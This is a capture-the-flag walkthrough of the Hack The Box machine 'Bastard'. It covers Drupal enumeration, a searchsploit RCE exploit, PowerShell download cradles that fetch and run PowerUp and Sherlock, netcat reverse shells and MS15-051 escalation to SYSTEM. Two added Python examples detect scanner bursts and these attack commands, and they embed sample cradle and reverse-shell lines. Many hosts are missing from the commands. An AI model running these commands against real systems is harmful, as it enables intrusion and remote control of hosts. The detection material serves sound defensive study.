Hack The Box: Bastard

Difficulty: Medium
Machine Creator: ch4p
Tools Used:

NMAP
Droopescan
Searchsploit
PHP
Burp Suite
Remote Code Execution
PowerShell Empire: PowerUp.ps1
Sherlock
Netcat

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC

HTTP – Drupal


For Drupal we can use a tool called droopescan, which we can install with pip:

apt-get install python-pip
pip install droopescan

Now we can run droopescan against the remote server. This will take a while to finish, because it probes a large list of module and theme paths.

droopescan scan drupal -u
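Seen from the server side, a droopescan run is easy to spot: the module and theme enumeration produces a burst of 404 responses from one client in a short window, usually preceded by a fetch of a version-disclosure file such as CHANGELOG.txt. The following Python is an added example, not part of the original write-up or of droopescan; it runs over constructed Apache combined-format log lines (addresses from the TEST-NET ranges, paths and thresholds chosen for illustration) and reports clients whose 404 rate looks like enumeration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines: one scanning client (198.51.100.7)
# that fetches CHANGELOG.txt and then probes module/theme paths, plus a
# normal visitor (192.0.2.10). Sample data only, not a real capture.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2018:12:00:01 +0000] "GET /CHANGELOG.txt HTTP/1.1" 200 2130 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:12:00:02 +0000] "GET /sites/all/modules/views/ HTTP/1.1" 404 211 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:12:00:02 +0000] "GET /sites/all/modules/ctools/ HTTP/1.1" 404 211 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:12:00:03 +0000] "GET /sites/all/modules/token/ HTTP/1.1" 404 211 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:12:00:03 +0000] "GET /sites/all/themes/zen/ HTTP/1.1" 404 211 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:12:00:04 +0000] "GET /sites/all/themes/omega/ HTTP/1.1" 404 211 "-" "python-requests/2.18.4"
198.51.100.7 - - [10/Mar/2018:12:00:04 +0000] "GET /sites/all/modules/pathauto/ HTTP/1.1" 404 211 "-" "python-requests/2.18.4"
192.0.2.10 - - [10/Mar/2018:12:00:05 +0000] "GET /node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2018:12:03:10 +0000] "GET /favicon.ico HTTP/1.1" 404 211 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, identd, user, [timestamp], "request", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Files whose contents reveal the Drupal version (CHANGELOG.txt ships with Drupal 7 core).
VERSION_FILES = {"/CHANGELOG.txt", "/core/CHANGELOG.txt"}


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_enumeration_bursts(lines, window_seconds=60, threshold=5):
    """Return {client_ip: details} for clients with >= threshold 404s inside any
    window_seconds-long sliding window. Threshold and window are assumptions;
    tune them against the site's normal 404 rate."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, recs in by_ip.items():
        misses = sorted(r["ts"] for r in recs if r["status"] == 404)
        # Two-pointer sliding window over the sorted 404 timestamps.
        best, start = 0, 0
        for end in range(len(misses)):
            while misses[end] - misses[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = {
                "max_404s_in_window": best,
                "version_probe": any(r["path"] in VERSION_FILES for r in recs),
                "sample_paths": sorted({r["path"] for r in recs if r["status"] == 404})[:5],
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_enumeration_bursts(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The same logic applies to any CMS scanner, not only droopescan; the version-probe flag is the Drupal-specific signal, and the simplest mitigation it points at is removing or blocking CHANGELOG.txt and similar version-disclosure files from the web root.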


We know this is a Drupal 7 server, so let's use searchsploit to see if there are any known vulnerabilities that we may be able to use.

searchsploit drupal

Let's copy the exploit to our working directory.

cp /usr/share/exploitdb/exploits/php/webapps/41564.php .

We need to manually edit this exploit, which is written in PHP. First install php-curl:

apt-get install php-curl

Burp Suite

Let's set up port forwarding. We will direct everything pointing to localhost:1337 to

Now set up the request handling.

Now we need to update our exploit to route through the proxy.

Exploit Execution

Remote Code Execution

Powershell Empire

We can find vulnerabilities using PowerUp from PowerShell Empire. Let's download PowerShell Empire.

git clone https://github.com/EmpireProject/Empire.git

Now that we have PSE downloaded, let's copy PowerUp.ps1 so we can edit it.

cp Empire/data/module_source/privesc/PowerUp.ps1 .

Now we need to pull PowerUp.ps1 from our web server and execute it on the remote machine.

In the webshell we can add this command:

IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile -

Looking at the results we can see "Access denied", which tells us that we don't have admin rights.

Going through the results, there is nothing that can help us elevate our permissions.


Let's try finding a vulnerability using Sherlock.ps1.

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

We can copy and execute Sherlock the same way that we did PowerUp:

IEX(New-Object Net.WebClient).DownloadString('') | powershell -noprofile -

Reverse Shell Netcat

Before we do our privilege escalation we need a remote shell. We can do this with the netcat x64 version.

wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

Unzip the netcat files so we can upload and run them.

Set up our netcat listener.

nc -lvnp 8081

Make sure the Python SimpleHTTPServer is running:

python -m SimpleHTTPServer

Enter the following URL in the browser to upload the netcat x64 binary and create a reverse shell. -e cmd 8081

Privilege Escalation


MS15-051 exploitx64.exe&fexec=ms15-051x64.exe whoami

Privileged Netcat

Similar to the previous netcat step, we are going to execute the existing nc file and create a second reverse shell running as SYSTEM.

nc -lvnp 8082

x64.exe&fexec=ms15-051x64.exe "nc -e 8082"
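Both shells in this write-up, the PowerUp/Sherlock download cradle and the two netcat reverse shells, leave a recognisable trace in process-creation telemetry: a web server worker spawning a shell, a PowerShell command line that combines IEX with a WebClient download, a netcat binary invoked with -e, and executables living in the web root. The following Python is an added example, not part of the original write-up or of any of the tools it uses; it applies those four rules to constructed process-creation records (Sysmon Event ID 1 style fields, with parent image, image and command line; the process names, paths and TEST-NET addresses are assumptions for the sample) and reports which records fire which rule.

```python
import re

# Constructed process-creation records, not real telemetry. Index 0 and 1 mirror
# the webshell-driven steps above; 2 and 3 are benign controls; 4 mirrors the
# second reverse shell launched through the local exploit binary.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/PowerUp.ps1')\""},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\inetpub\wwwroot\nc.exe",
     "cmd": "nc.exe -e cmd 192.0.2.10 8081"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -NoProfile -Command Get-Process"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\nc.exe",
     "cmd": "nc.exe -zv 192.0.2.20 80"},
    {"parent": r"C:\inetpub\wwwroot\ms15-051x64.exe",
     "image": r"C:\inetpub\wwwroot\nc.exe",
     "cmd": "nc -e cmd 192.0.2.10 8082"},
]

# Rule 1: PowerShell download cradle = an evaluation primitive plus a download primitive.
IEX_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
DOWNLOAD_RE = re.compile(r"(?i)\b(net\.webclient|downloadstring|downloadfile|invoke-webrequest)\b")
# Rule 2: a netcat-family binary asked to attach a shell to the connection.
NC_RE = re.compile(r"(?i)\b(nc|nc64|ncat|netcat)(\.exe)?\b.*\s-e\s+(cmd|powershell)\b")
# Rule 3: shell or netcat spawned directly by a web server worker process.
WEB_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "nc.exe", "nc64.exe", "ncat.exe"}
# Rule 4: executable located in (or launched from) a web-writable document root.
WEBROOT_RE = re.compile(r"(?i)\\(inetpub\\wwwroot|htdocs|www)\\")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names this event triggers, in fixed rule order."""
    hits = []
    cmd = event["cmd"]
    if IEX_RE.search(cmd) and DOWNLOAD_RE.search(cmd):
        hits.append("powershell_download_cradle")
    if NC_RE.search(cmd):
        hits.append("netcat_exec_reverse_shell")
    if basename(event["parent"]) in WEB_PARENTS and basename(event["image"]) in SHELL_IMAGES:
        hits.append("shell_from_web_worker")
    if WEBROOT_RE.search(event["image"]) or WEBROOT_RE.search(event["parent"]):
        hits.append("exec_from_web_root")
    return hits


def scan(events):
    """Return [(index, rule_names)] for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmd"], "->", rules)
```

Rule 3 is the one with the best signal-to-noise ratio for a Drupal or IIS host: a web worker should never need to start cmd.exe or powershell.exe, so that rule can usually be deployed as a block rather than an alert. Rule 4 is only meaningful where the web root is writable by the application, which is exactly the condition that let the exploit stage its binaries.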

User.txt and Root.txt

#Drupal #hackthebox #RCE #RemoteCodeExecution